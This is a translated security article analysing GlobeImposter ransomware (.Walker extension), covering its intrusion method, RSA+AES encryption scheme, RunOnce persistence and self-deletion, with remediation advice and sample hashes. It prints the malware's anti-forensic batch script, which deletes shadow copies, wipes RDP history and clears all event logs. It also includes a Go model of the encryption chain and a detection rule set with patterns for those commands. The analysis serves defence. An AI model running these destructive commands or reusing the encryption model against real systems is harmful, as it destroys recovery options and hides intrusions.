
What to do when files are encrypted with the .Walker extension after a GlobeImposter ransomware attack

2025-01-25 Update From: SLTechnology News&Howtos shulou


Shulou (Shulou.com) 05/31 Report

Many newcomers are not clear about what to do when a GlobeImposter ransomware attack leaves their files encrypted with the .Walker extension. To help solve this problem, this article explains the matter in detail; readers who need it can follow along, and hopefully gain something from it.

GlobeImposter ransomware has had no substantial technical update for some time. The recent outbreak is concentrated in corporate intranets and has less impact on individual computer users. We remind enterprise users to take the recent damage done by GlobeImposter seriously and to back up key business systems in advance, so that a successful infection does not cause serious losses to the business systems.

For systems that are already infected, it is recommended to take them off the intranet and reconnect them only after the virus has been cleaned up. For the other, uninfected computers in the intranet, any weak login password should be changed as soon as possible to a complex password composed of letters, numbers and special characters, so that attackers cannot brute-force it (corporate network administrators can configure a policy that forces strong passwords; do not log in with weak passwords).

Install operating system patches promptly to avoid attacks through vulnerabilities. If end users do not need the Remote Desktop service, it is recommended to disable it. If a ransomware intrusion has already occurred on the local area network, ports 135, 139 and 445 can be closed temporarily (the Server service is temporarily disabled) to reduce the possibility of remote intrusion.

Impact rating

High risk. The attackers first break into the corporate intranet and then keep spreading inside it by brute-forcing RDP and SMB credentials. Except for a few excluded folders, all files are encrypted, and the damaged files cannot be decrypted and restored unless the key is obtained.

Affected scope

Computers running Windows are affected. At present, the Royal Threat Intelligence Center has found that a number of enterprises in Guangdong, Henan, Heilongjiang and other places have been victimized, and more are expected in the near future.

Sample analysis

1. Intrusion analysis

On an infected user's machine, a large number of brute-force attempts against port 445 were recorded from August 25 to the early morning of August 26.

The source of the attacks is a machine that is not in the local segment of the intranet, which shows that all branches of the enterprise face the corresponding risk.

2. Sample analysis

Description of the encryption algorithm

The ransomware uses RSA+AES encryption, involving two RSA key pairs (the hacker's public and private keys and the user's public and private keys, denoted hacker_rsa_xxx and user_rsa_xxx respectively) and an AES key. The hacker's RSA key encrypts the user's RSA key, the user's RSA key encrypts the AES key, and the AES key encrypts the file contents.

The specific encryption process is as follows:

The ransomware first decodes a built-in RSA public key (hacker_rsa_pub) and generates an RSA key pair (user_rsa_pub and user_rsa_pri) for each victim; the generated key information is encrypted with the built-in RSA public key (hacker_rsa_pub) and used as the user ID. It then traverses the file system and encrypts every file that meets its criteria. For each file, a unique identifier is generated with CoCreateGuid, and the AES key (denoted file_aes_key) is ultimately derived from that identifier and used to encrypt the file. While a file is being encrypted, its unique identifier is encrypted with the user's RSA public key (user_rsa_pub) and saved into the file.

After receiving the ransom, the user ID and the file, the hacker decrypts the user ID with his own private key (hacker_rsa_pri) to obtain user_rsa_pri. With user_rsa_pri he decrypts the identifier stored in the file to obtain its file_aes_key, and then decrypts the original file with AES.

3. Auto-start analysis

To hinder analysis of the malicious sample, most strings and part of the API names are encrypted and are only decrypted dynamically in memory at run time. After decryption, the folder names and extensions that the sample excludes from encryption can be seen. The sample first reads the environment variables %LOCALAPPDATA% and %APPDATA% and exits if it cannot obtain them; otherwise it copies itself into that directory and adds an auto-start entry.

After copying itself, it writes that path to the following registry key to enable auto-start:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck

4. Encryption process analysis

It enumerates every drive letter on the current machine:

Then it creates a thread for each drive letter to encrypt the files on it.

Before encrypting a file, it first skips files that already carry the .Walker extension, the file named HOW_TO_BACK_FILES.html and the file holding the saved user ID, as well as files under the following paths:

The remaining files are then encrypted.

GlobeImposter encrypts files with the AES algorithm. The AES key is generated randomly on the local machine. First, the IV for AES is derived from the size and path of the current file: the IV is the first 16 bytes of the message digest MD(filesize || filename).

It then uses MBEDTLS_MD_SHA256 to hash the IV together with another generated secret twice, and uses the hash result as the AES key.

The GUID is then encrypted with the built-in RSA public key, and the encrypted GUID and the user ID are written into the current file.

Finally, the file contents are encrypted with AES.
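To make the three-level key hierarchy (sections 2 and 4 above) and the per-file IV/key derivation concrete, here is a Go model added for this article; it is not code from the sample or from the original analysis. It assumes RSA-2048 with OAEP (chunked so that user_rsa_pri fits), SHA-256 standing in for the unnamed MD digest, AES-256 in CTR mode, a random 16-byte value standing in for the CoCreateGuid result, and a field order for the per-file record; the names genKey, rsaSeal, rsaOpen, fileIVAndKey, aesCTR, encFile, infect and recoverFile are the example's own. The point it shows is the defender's: the same encrypted record yields an error, not plaintext, for anyone without hacker_rsa_pri, and even the right key produces garbage if the path fed into the IV derivation has changed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/binary"
)

// genKey makes an RSA-2048 pair; the key size is an assumption of this model.
func genKey() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// rsaSeal encrypts a message of any length under pub with RSA-OAEP, chunked to fit
// the modulus (assumed: the text does not say how the sample wraps user_rsa_pri).
func rsaSeal(pub *rsa.PublicKey, msg []byte) []byte {
	chunk := pub.Size() - 2*sha256.Size - 2
	var out []byte
	for len(msg) > 0 {
		n := len(msg)
		if n > chunk {
			n = chunk
		}
		c, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, msg[:n], nil)
		if err != nil {
			panic(err) // chunking keeps msg[:n] in range, so only a broken RNG gets here
		}
		out, msg = append(out, c...), msg[n:]
	}
	return out
}

// rsaOpen reverses rsaSeal; it fails unless priv matches the sealing public key.
func rsaOpen(priv *rsa.PrivateKey, ct []byte) ([]byte, error) {
	var out []byte
	for k := priv.Size(); len(ct) >= k; ct = ct[k:] {
		p, err := rsa.DecryptOAEP(sha256.New(), nil, priv, ct[:k], nil)
		if err != nil {
			return nil, err
		}
		out = append(out, p...)
	}
	return out, nil
}

// fileIVAndKey follows the text: IV = first 16 bytes of MD(filesize || filename);
// file_aes_key = digest applied twice over IV and the per-file secret (the GUID). SHA-256 assumed.
func fileIVAndKey(size uint64, name string, guid []byte) (iv, key []byte) {
	var sz [8]byte
	binary.LittleEndian.PutUint64(sz[:], size)
	h := sha256.Sum256(append(sz[:], name...))
	k1 := sha256.Sum256(append(append([]byte{}, h[:16]...), guid...))
	k2 := sha256.Sum256(k1[:])
	return h[:16], k2[:]
}

// aesCTR applies AES-256-CTR; the mode is an assumption (the text says only AES).
func aesCTR(key, iv, data []byte) []byte {
	block, _ := aes.NewCipher(key) // key is always 32 bytes here, so this cannot fail
	out := make([]byte, len(data))
	cipher.NewCTR(block, iv).XORKeyStream(out, data)
	return out
}

// encFile is the per-file record: GUID sealed under user_rsa_pub, user ID
// (user_rsa_pri sealed under hacker_rsa_pub), AES body. The order is assumed.
type encFile struct{ sealedGUID, userID, body []byte }

// infect generates the victim's user_rsa pair, seals its private key into the
// user ID, and encrypts one file's content under a fresh per-file GUID.
func infect(hackerPub *rsa.PublicKey, name string, content []byte) (*encFile, error) {
	userPriv, err := genKey()
	if err != nil {
		return nil, err
	}
	guid := make([]byte, 16) // stands in for the CoCreateGuid value
	rand.Read(guid)
	iv, key := fileIVAndKey(uint64(len(content)), name, guid)
	userID := rsaSeal(hackerPub, x509.MarshalPKCS1PrivateKey(userPriv))
	return &encFile{rsaSeal(&userPriv.PublicKey, guid), userID, aesCTR(key, iv, content)}, nil
}

// recoverFile walks the chain only hacker_rsa_pri unlocks: user ID -> user_rsa_pri
// -> GUID -> file_aes_key -> content. CTR preserves length, so len(body) is the file size.
func recoverFile(hackerPriv *rsa.PrivateKey, f *encFile, name string) ([]byte, error) {
	der, err := rsaOpen(hackerPriv, f.userID)
	if err != nil {
		return nil, err // wrong private key: the OAEP padding check fails
	}
	userPriv, err := x509.ParsePKCS1PrivateKey(der)
	if err != nil {
		return nil, err
	}
	guid, err := rsaOpen(userPriv, f.sealedGUID)
	if err != nil {
		return nil, err
	}
	iv, key := fileIVAndKey(uint64(len(f.body)), name, guid)
	return aesCTR(key, iv, f.body), nil
}
```

Usage: generate the hacker pair with genKey, call infect with its public key, then call recoverFile with its private key (the content comes back) and with any other key (an error comes back). Because the IV is bound to filesize || filename, calling recoverFile with the real key but a different path returns garbage rather than an error, which is a reason for incident responders to preserve the original paths and sizes of encrypted files.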

5. Self-deletion analysis

It deletes itself by calling cmd /c del.

In the Temp directory it drops a .bat script whose main purpose is to delete the Remote Desktop connection information file Default.rdp and to clear the event logs with the wevtutil.exe cl command.

The contents of the decrypted bat file are as follows:

@echo off
rem delete all volume shadow copies so files cannot be restored from them
vssadmin.exe Delete Shadows /All /Quiet
rem wipe the Remote Desktop connection history kept in the registry
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
rem remove the saved Default.rdp after clearing its system and hidden attributes
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
rem clear every event log that wevtutil can enumerate
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Solution

1. Install professional endpoint security management software across the whole network, so that administrators can remove the virus and install patches in batches, and then regularly roll out all high-risk system patches.

2. Deploy traffic monitoring and blocking devices or software to make early detection, blocking and retrospective investigation possible.

3. For systems that cannot be patched in time for other reasons, consider strict access control policies on the network perimeter, routers and firewalls to keep the network secure as it changes.

4. For systems with weak passwords, users should be urged to change them while their security awareness is raised, or policies should be used to enforce password length and complexity.

5. For services with weak or empty passwords, strengthen the passwords and use encrypted transport for key services. For services that can be shut down, close the unneeded service ports. Do not use the same password to manage multiple critical servers.

6. Network, system and security administrators should follow security news, security trends and the latest serious vulnerabilities, as well as the attack-and-defence cycle that accompanies the life cycle of each mainstream operating system and application service.

7. Configure the password policy of database accounts and strengthen policies such as the maximum number of failed logins, lockout after the allowed number of failures, password validity period, grace period after expiry, and password reuse.

8. Strictly restrict the addresses of the database management access nodes, so that only specific management host IPs are allowed to log in to the database remotely.
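Item 2 above asks for monitoring that can detect and block such activity early. As an added example (not part of the original article or of any product it names), the Go program below runs a few behaviour rules over constructed process-creation and registry-write events in a "kind|detail" line format of the example's own, looking for exactly the actions the analysis attributes to the sample: vssadmin shadow copy deletion, wevtutil cl log clearing, deletion of the Terminal Server Client registry keys, and the RunOnce\BrowserUpdateCheck auto-start value. The event format, the benign noise lines, the user name alice and the rule names are all assumptions of the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// sampleEvents is constructed endpoint telemetry, one "kind|detail" record per line.
// The lines are made up for this example; they mirror the behaviours the analysis
// above attributes to the sample, interleaved with benign activity.
const sampleEvents = `process|C:\Windows\System32\vssadmin.exe Delete Shadows /All /Quiet
process|reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
process|wevtutil.exe cl Security
process|cmd.exe /c del C:\Users\alice\AppData\Local\Temp\update.exe
registry|HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck = C:\Users\alice\AppData\Local\BrowserUpdateCheck.exe
process|C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt
registry|HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe`

// rule pairs a behaviour named in the analysis with the event kind it shows up in
// and a pattern over the event detail.
type rule struct {
	name, kind string
	re         *regexp.Regexp
}

var rules = []rule{
	{"shadow copies deleted (vssadmin)", "process", regexp.MustCompile(`(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b`)},
	{"event log cleared (wevtutil cl)", "process", regexp.MustCompile(`(?i)\bwevtutil(\.exe)?\s+cl\b`)},
	{"RDP history removed (Terminal Server Client key)", "process", regexp.MustCompile(`(?i)\breg\s+delete\s+"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client`)},
	{"RunOnce persistence: BrowserUpdateCheck", "registry", regexp.MustCompile(`(?i)\\CurrentVersion\\RunOnce\\BrowserUpdateCheck\b`)},
}

type alert struct {
	Rule, Detail string
	Line         int
}

// scan runs every rule over every event and returns the matches in event order.
func scan(events string) []alert {
	var out []alert
	for i, line := range strings.Split(events, "\n") {
		parts := strings.SplitN(line, "|", 2)
		if len(parts) != 2 {
			continue // malformed record: skip rather than guess
		}
		for _, r := range rules {
			if r.kind == parts[0] && r.re.MatchString(parts[1]) {
				out = append(out, alert{r.name, parts[1], i + 1})
			}
		}
	}
	return out
}

// recoveryInhibited reports whether the host has shown both actions the dropped
// .bat script combines: shadow copy deletion and event log clearing. Either one
// alone also occurs in legitimate administration, so the pair is what is flagged.
func recoveryInhibited(alerts []alert) bool {
	seen := map[string]bool{}
	for _, a := range alerts {
		seen[a.Rule] = true
	}
	return seen[rules[0].name] && seen[rules[1].name]
}

func main() {
	alerts := scan(sampleEvents)
	for _, a := range alerts {
		fmt.Printf("line %d: %s\n    %s\n", a.Line, a.Rule, a.Detail)
	}
	fmt.Println("recovery inhibited:", recoveryInhibited(alerts))
}
```

On the constructed input, lines 1, 2, 3 and 5 raise alerts and the shadow-copy plus log-clearing pair sets recoveryInhibited to true. The RunOnce rule is pinned to the value name reported in the auto-start analysis; in real telemetry it is worth widening to any RunOnce write whose data points into a user-profile path, since the value name is the easiest thing for a new build to change.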

To keep intruders out, a more complete protection system is needed: every endpoint should run professional antivirus software to block virus attacks. For administrators, security products with comprehensive management functions, such as centralized control of endpoint antivirus, centralized patch management and policy control, can be used to fully understand and manage the security posture of the enterprise intranet and protect the enterprise.

In addition, deploying products such as advanced threat detection systems, situational awareness platforms and cyberspace risk radars on the intranet helps to build a security system that integrates risk monitoring, analysis, early warning, response and visualization across endpoint security, perimeter security, website monitoring and unified monitoring, so as to protect enterprise users' networks from all directions and stop intrusions in time.

To prevent ransomware attacks, enterprise users should patch servers in time, close unnecessary file shares, ports and services wherever possible, use strong and unique server accounts and passwords and change them regularly, set access controls between servers and workstations that have no need to communicate with each other, and use Tencent defense points on terminal computers to defend against virus and Trojan attacks.

At the same time, enterprise users are advised to configure a backup system for key business, creating multiple backups and off-site backups of important business data, so that the backup data is not destroyed by ransomware. Once an infection occurs, the business system can then be quickly restored and rebuilt to avoid major losses.

Individual users should install operating system vulnerability patches in time, back up important data and files safely, and enable the document guardian feature to protect them from ransomware.

MD5: 06cf8bdf3c3a3dbe7c054cb4ff98b28f

MD5 values of related samples of the same family (they differ only in the extension appended to encrypted files):

8fd381a971872db6e8e67c838070c49f

9f5d9e2b4ebb9ffe10ca665bd3007562

8cabf7aad09357ff658e078c01d41dd2

1b63d6f158e306e095d39de60b2ae4ec

Cb379148ae15024738913e5853f19381

74dfac6a06795a4a0eed158f47eead7b
